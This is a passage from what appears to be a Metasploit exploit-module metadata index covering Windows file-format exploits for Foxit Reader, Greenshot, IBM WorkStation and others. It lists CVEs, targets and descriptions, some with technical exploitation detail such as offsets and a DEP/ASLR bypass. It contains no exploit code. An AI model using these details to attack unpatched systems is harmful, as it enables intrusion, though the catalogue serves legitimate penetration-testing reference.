"windows/fileformat/erdas_er_viewer_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/erdas_er_viewer_rf_report_error": { - "name": "ERS Viewer 2013 ERS File Handling Buffer Overflow", - "fullname": "exploit/windows/fileformat/erdas_er_viewer_rf_report_error", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-23", - "type": "exploit", - "author": [ - "James Fitts", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.\n The vulnerability exists in the module ermapper_u.dll, where the function\n rf_report_error handles user provided data in an insecure way. It results in\n arbitrary code execution under the context of the user viewing a specially crafted\n .ers file. This module has been tested successfully with ERS Viewer 2013 (versions\n 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2013-3482", - "OSVDB-93650", - "URL-http://web.archive.org/web/20130609135637/http://secunia.com:80/advisories/53620" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR", - "ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/erdas_er_viewer_rf_report_error", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/esignal_styletemplate_bof": { - "name": "eSignal and eSignal Pro File Parsing Buffer Overflow in QUO", - "fullname": "exploit/windows/fileformat/esignal_styletemplate_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-09-06", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "TecR0c ", - "mr_me " - ], - "description": "The software is unable to handle the \"\" files (even those\n original included in the program) like those with the registered\n extensions QUO, SUM and POR. Successful exploitation of this\n vulnerability may take up to several seconds due to the use of\n egghunter. Also, DEP bypass is unlikely due to the limited space for\n payload. This vulnerability affects versions 10.6.2425.1208 and earlier.", - "references": [ - "CVE-2011-3494", - "OSVDB-75456", - "BID-49600", - "URL-http://aluigi.altervista.org/adv/esignal_1-adv.txt", - "EDB-17837" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Win XP SP3 / Windows Vista / Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/esignal_styletemplate_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/etrust_pestscan": { - "name": "CA eTrust PestPatrol ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/fileformat/etrust_pestscan", - "aliases": [], - "rank": 200, - "disclosure_date": "2009-11-02", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in CA eTrust PestPatrol. When\n sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2009-4225", - "OSVDB-60862" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/etrust_pestscan.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/etrust_pestscan", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ezip_wizard_bof": { - "name": "eZip Wizard 3.0 Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/ezip_wizard_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-03-09", - "type": "exploit", - "author": [ - "fl0 fl0w", - "jduck ", - "Lincoln" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 3.0 of ediSys Corp.'s eZip Wizard.\n\n In order for the command to be executed, an attacker must convince someone to\n open a specially crafted zip file with eZip Wizard, and access the specially\n file via double-clicking it. By doing so, an attacker can execute arbitrary\n code as the victim user.", - "references": [ - "CVE-2009-1028", - "OSVDB-52815", - "BID-34044", - "URL-http://www.edisys.com/", - "EDB-8180", - "EDB-12059" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ezip_wizard_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ezip_wizard_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/fatplayer_wav": { - "name": "Fat Player Media Player 0.6b0 Buffer Overflow", - "fullname": "exploit/windows/fileformat/fatplayer_wav", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-10-18", - "type": "exploit", - "author": [ - "James Fitts ", - "dookie" - ], - "description": "This module exploits a buffer overflow in Fat Player 0.6b. When\n the application is used to import a specially crafted wav file, a buffer overflow occurs\n allowing arbitrary code execution.", - "references": [ - "CVE-2009-4962", - "OSVDB-57343", - "EDB-15279" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/fatplayer_wav.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/fatplayer_wav", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/fdm_torrent": { - "name": "Free Download Manager Torrent Parsing Buffer Overflow", - "fullname": "exploit/windows/fileformat/fdm_torrent", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-02-02", - "type": "exploit", - "author": [ - "SkD ", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Free Download Manager\n 3.0 Build 844. Arbitrary code execution could occur when parsing a\n specially crafted torrent file.", - "references": [ - "CVE-2009-0184", - "OSVDB-54033", - "BID-33555", - "URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18", - "URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18", - "URL-http://web.archive.org/web/20090205145829/http://secunia.com:80/secunia_research/2009-5", - "URL-http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Free Download Manager 3.0 (Build 844)" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/fdm_torrent.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/fdm_torrent", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/feeddemon_opml": { - "name": "FeedDemon Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/feeddemon_opml", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-02-09", - "type": "exploit", - "author": [ - "fl0 fl0w", - "dookie", - "jduck " - ], - "description": "This module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application\n is used to import a specially crafted opml file, a buffer overflow occurs allowing\n arbitrary code execution.\n\n All versions are suspected to be vulnerable. This vulnerability was originally reported\n against version 2.7 in February of 2009.", - "references": [ - "CVE-2009-0546", - "OSVDB-51753", - "BID-33630", - "EDB-7995", - "EDB-8010", - "EDB-11379" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/feeddemon_opml.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/feeddemon_opml", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/foxit_reader_filewrite": { - "name": "Foxit PDF Reader 4.2 Javascript File Write", - "fullname": "exploit/windows/fileformat/foxit_reader_filewrite", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-03-05", - "type": "exploit", - "author": [ - "bannedit ", - "Chris Evans" - ], - "description": "This module exploits an unsafe Javascript API implemented in Foxit PDF Reader\n version 4.2. The createDataObject() Javascript API function allows for writing\n arbitrary files to the file system. This issue was fixed in version 4.3.1.0218.\n\n Note: This exploit uses the All Users directory currently, which required\n administrator privileges to write to. This means an administrative user has to\n open the file to be successful. Kind of lame but thats how it goes sometimes in\n the world of file write bugs.", - "references": [ - "OSVDB-71104", - "URL-http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Foxit PDF Reader v4.2 (Windows XP SP0-SP3)", - "Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/foxit_reader_filewrite", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/foxit_reader_launch": { - "name": "Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow", - "fullname": "exploit/windows/fileformat/foxit_reader_launch", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-03-09", - "type": "exploit", - "author": [ - "Francisco Falcon", - "bannedit " - ], - "description": "This module exploits a buffer overflow in Foxit Reader 3.0 builds 1301 and earlier.\n Due to the way Foxit Reader handles the input from an \"Launch\" action, it is possible\n to cause a stack-based buffer overflow, allowing an attacker to gain arbitrary code\n execution under the context of the user.", - "references": [ - "CVE-2009-0837", - "OSVDB-55614", - "BID-34035", - "URL-http://www.coresecurity.com/content/foxit-reader-vulnerabilities" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Foxit Reader 3.0 Windows XP SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/foxit_reader_launch.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/foxit_reader_launch", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/foxit_reader_uaf": { - "name": "Foxit PDF Reader Pointer Overwrite UAF", - "fullname": "exploit/windows/fileformat/foxit_reader_uaf", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-04-20", - "type": "exploit", - "author": [ - "mr_me", - "bit from meepwn", - "saelo", - "Jacob Robles" - ], - "description": "Foxit PDF Reader v9.0.1.1049 has a Use-After-Free vulnerability\n in the Text Annotations component and the TypedArray's use\n uninitialized pointers.\n\n The vulnerabilities can be combined to leak a vtable memory address,\n which can be adjusted to point to the base address of the executable.\n A ROP chain can be constructed that will execute when Foxit Reader\n performs the UAF.\n\n This module has been tested on Windows 7 x64, Windows 10 Pro x64\n Build 17134, and Windows 10 Enterprise x64. Windows 10 Enterprise\n must have insecure logons enabled for the exploit to work as expected.", - "references": [ - "CVE-2018-9948", - "CVE-2018-9958", - "ZDI-18-332", - "ZDI-18-342", - "URL-https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html", - "URL-https://srcincite.io/pocs/cve-2018-99{48,58}.pdf.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 Pro x64 Build 17134" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/foxit_reader_uaf.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/foxit_reader_uaf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/foxit_title_bof": { - "name": "Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/foxit_title_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-11-13", - "type": "exploit", - "author": [ - "dookie", - "Sud0", - "corelanc0d3r ", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Foxit PDF Reader prior to version\n 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that\n contains an overly long string in the Title field. This results in overwriting a\n structured exception handler record.\n\n NOTE: This exploit does not use javascript.", - "references": [ - "OSVDB-68648", - "EDB-15532", - "URL-http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Foxit Reader v4.1.1 XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/foxit_title_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/foxit_title_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/free_mp3_ripper_wav": { - "name": "Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/free_mp3_ripper_wav", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-08-27", - "type": "exploit", - "author": [ - "Richard Leahy", - "X-h4ck", - "Tiago Henriques", - "James Fitts " - ], - "description": "This module exploits a stack based buffer overflow found in Free MP3 CD\n Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious\n WAV file.", - "references": [ - "CVE-2011-5165", - "OSVDB-63349", - "EDB-11975", - "EDB-17727" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 EN" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/free_mp3_ripper_wav", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/galan_fileformat_bof": { - "name": "gAlan 0.2.1 Buffer Overflow", - "fullname": "exploit/windows/fileformat/galan_fileformat_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-12-07", - "type": "exploit", - "author": [ - "Jeremy Brown <0xjbrown41@gmail.com>", - "loneferret" - ], - "description": "This module exploits a stack buffer overflow in gAlan 0.2.1\n by creating a specially crafted galan file.", - "references": [ - "OSVDB-60897", - "EDB-10339" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/galan_fileformat_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/galan_fileformat_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/greenshot_deserialize_cve_2023_34634": { - "name": "Greenshot .NET Deserialization Fileformat Exploit", - "fullname": "exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-07-26", - "type": "exploit", - "author": [ - "p4r4bellum", - "bwatters-r7" - ], - "description": "There exists a .NET deserialization vulnerability in Greenshot version 1.3.274\n and below. The deserialization allows the execution of commands when a user opens\n a Greenshot file. The commands execute under the same permissions as the Greenshot\n service. Typically, is the logged in user.", - "references": [ - "CVE-2023-34634", - "EDB-51633" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2023-08-17 08:48:42 +0000", - "path": "/modules/exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/greenshot_deserialize_cve_2023_34634", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/gsm_sim": { - "name": "GSM SIM Editor 5.15 Buffer Overflow", - "fullname": "exploit/windows/fileformat/gsm_sim", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-07-07", - "type": "exploit", - "author": [ - "Ruben Alejandro", - "chap0 ", - "Lincoln " - ], - "description": "This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.\n When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer\n overflow occurs which allows an attacker to execute arbitrary code.", - "references": [ - "CVE-2015-1171", - "OSVDB-81161", - "EDB-14258" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/gsm_sim.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/gsm_sim", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/gta_samp": { - "name": "GTA SA-MP server.cfg Buffer Overflow", - "fullname": "exploit/windows/fileformat/gta_samp", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-09-18", - "type": "exploit", - "author": [ - "Silent_Dream" - ], - "description": "This module exploits a stack-based buffer overflow in GTA SA-MP Server.\n This buffer overflow occurs when the application attempts to open a malformed\n server.cfg file. To exploit this vulnerability, an attacker must send the\n victim a server.cfg file and have them run samp-server.exe.", - "references": [ - "OSVDB-83433", - "EDB-17893" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "GTA SA-MP (samp-server) v0.3.1.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/gta_samp.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/gta_samp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/hhw_hhp_compiledfile_bof": { - "name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", - "fullname": "exploit/windows/fileformat/hhw_hhp_compiledfile_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-02-06", - "type": "exploit", - "author": [ - "bratax", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n By creating a specially crafted hhp file, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2006-0564", - "OSVDB-22941", - "EDB-1488", - "EDB-1490" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP English SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/hhw_hhp_compiledfile_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/hhw_hhp_contentfile_bof": { - "name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", - "fullname": "exploit/windows/fileformat/hhw_hhp_contentfile_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-02-06", - "type": "exploit", - "author": [ - "bratax", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.", - "references": [ - "CVE-2006-0564", - "OSVDB-22941", - "EDB-1470", - "EDB-1495" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP English SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/hhw_hhp_contentfile_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/hhw_hhp_indexfile_bof": { - "name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", - "fullname": "exploit/windows/fileformat/hhw_hhp_indexfile_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-01-17", - "type": "exploit", - "author": [ - "Encrypt3d.M!nd", - "loneferret", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.", - "references": [ - "CVE-2009-0133", - "BID-33189", - "OSVDB-22941", - "EDB-10323", - "EDB-10335" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP English SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/hhw_hhp_indexfile_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/homm3_h3m": { - "name": "Heroes of Might and Magic III .h3m Map file Buffer Overflow", - "fullname": "exploit/windows/fileformat/homm3_h3m", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-07-29", - "type": "exploit", - "author": [ - "Pierre Lindblad", - "John AAkerblom" - ], - "description": "This module embeds an exploit into an uncompressed map file (.h3m) for\n Heroes of Might and Magic III. Once the map is started in-game, a\n buffer overflow occurring when loading object sprite names leads to\n shellcode execution.", - "references": [ - "EDB-37716" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]", - "HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]", - "Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]" - ], - "mod_time": "2023-07-14 12:46:26 +0000", - "path": "/modules/exploits/windows/fileformat/homm3_h3m.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/homm3_h3m", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ht_mp3player_ht3_bof": { - "name": "HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow", - "fullname": "exploit/windows/fileformat/ht_mp3player_ht3_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-06-29", - "type": "exploit", - "author": [ - "hack4love ", - "His0k4", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HT-MP3Player 1.0.\n Arbitrary code execution could occur when parsing a specially crafted\n .HT3 file.\n\n NOTE: The player installation does not register the file type to be\n handled. Therefore, a user must take extra steps to load this file.", - "references": [ - "CVE-2009-2485", - "OSVDB-55449", - "EDB-9034", - "EDB-9038" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HT-MP3Player 1.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ht_mp3player_ht3_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ibm_forms_viewer_fontname": { - "name": "IBM Forms Viewer Unicode Buffer Overflow", - "fullname": "exploit/windows/fileformat/ibm_forms_viewer_fontname", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-12-05", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability\n is due to a dangerous usage of a strcpy-like function, and occurs while parsing malformed\n XFDL files containing a long fontname value. This module has been tested successfully on IBM\n Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2013-5447", - "OSVDB-100732", - "ZDI-13-274", - "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21657500" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ibm_forms_viewer_fontname", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ibm_pcm_ws": { - "name": "IBM Personal Communications iSeries Access WorkStation 5.9 Profile", - "fullname": "exploit/windows/fileformat/ibm_pcm_ws", - "aliases": [], - "rank": 500, - "disclosure_date": "2012-02-28", - "type": "exploit", - "author": [ - "TecR0c " - ], - "description": "The IBM Personal Communications I-Series application WorkStation is susceptible to a\n stack-based buffer overflow vulnerability within file parsing in which data copied to a\n location in memory exceeds the size of the reserved destination area. The buffer is located\n on the runtime program stack.\n\n When the WorkStation file is opened it will reach the code path at 0x67575180 located in\n pcspref.dll which conducts string manipulation and validation on the data supplied in the\n WorkStation file. The application will first check if 'Profile' header exists and appends\n a dot with the next parameter within the file. It will then measure the character length\n of the header by calling strcspn with a dot as its null-terminated character.\n\n It will then write the header into memory and ensure the header ends with a NUL character.\n The parameter character array is passed to the strcpy() function. The application has\n declared a 52-element character array for the destination for strcpy function. The\n function does not perform bounds checking therefore, data can be written paste the end of\n the buffer variable resulting in corruption of adjacent variables including other local\n variables, program state information and function arguments. You will notice that the\n saved RETURN address at offset 0x6c is overwritten by the data written past the buffer.\n\n To ensure we can perform arbitrary code execution we must we provide a valid pointer at\n 0x74 which is used as an argument for the called function at 0x675751ED as an id file\n extension parameter. Once the caller regains control we will reach our RETURN. The Ret\n instruction will be used to pop the overwritten saved return address which was corrupted.\n\n This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform.\n\n Versions tested:\n IBM System i Access for Windows V6R1M0 version 06.01.0001.0000a\n Which bundles pcsws.exe version 5090.27271.709\n\n Tested on:\n Microsoft Windows XP [Version 5.1.2600]\n Microsoft Windows Vista [Version 6.0.6002]\n Microsoft Windows 7 [Version 6.1.7600]", - "references": [ - "CVE-2012-0201", - "OSVDB-79657", - "URL-https://www-304.ibm.com/support/docview.wss?uid=swg21586166" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IBM WorkStation 5.9 (Windows XP SP3)", - "IBM WorkStation 5.9 (Windows 7, Windows Vista)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ibm_pcm_ws.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ibm_pcm_ws", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/icofx_bof": { - "name": "IcoFX Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/icofx_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-12-10", - "type": "exploit", - "author": [ - "Marcos Accossatto", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in version 2.1\n of IcoFX. The vulnerability exists while parsing .ICO files, where a specially\n crafted ICONDIR header providing an arbitrary long number of images in the file\n can be used to trigger the overflow when reading the ICONDIRENTRY structures.", - "references": [ - "CVE-2013-4988", - "OSVDB-100826", - "BID-64221", - "EDB-30208", - "URL-http://www.coresecurity.com/advisories/icofx-buffer-overflow-vulnerability" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IcoFX 2.5 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/icofx_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/icofx_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ideal_migration_ipj": { - "name": "PointDev IDEAL Migration Buffer Overflow", - "fullname": "exploit/windows/fileformat/ideal_migration_ipj", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-05", - "type": "exploit", - "author": [ - "Dr_IDE", - "dookie", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in versions v9.7\n through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of\n IDEAL Migration. All versions are suspected to be vulnerable.\n By creating a specially crafted ipj file, an attacker may be able\n to execute arbitrary code.\n\n NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH", - "references": [ - "CVE-2009-4265", - "OSVDB-60681", - "EDB-10319", - "EDB-12403", - "EDB-12404", - "EDB-12540" - ], - "platform": "Windows", - "arch": "", - "rport": 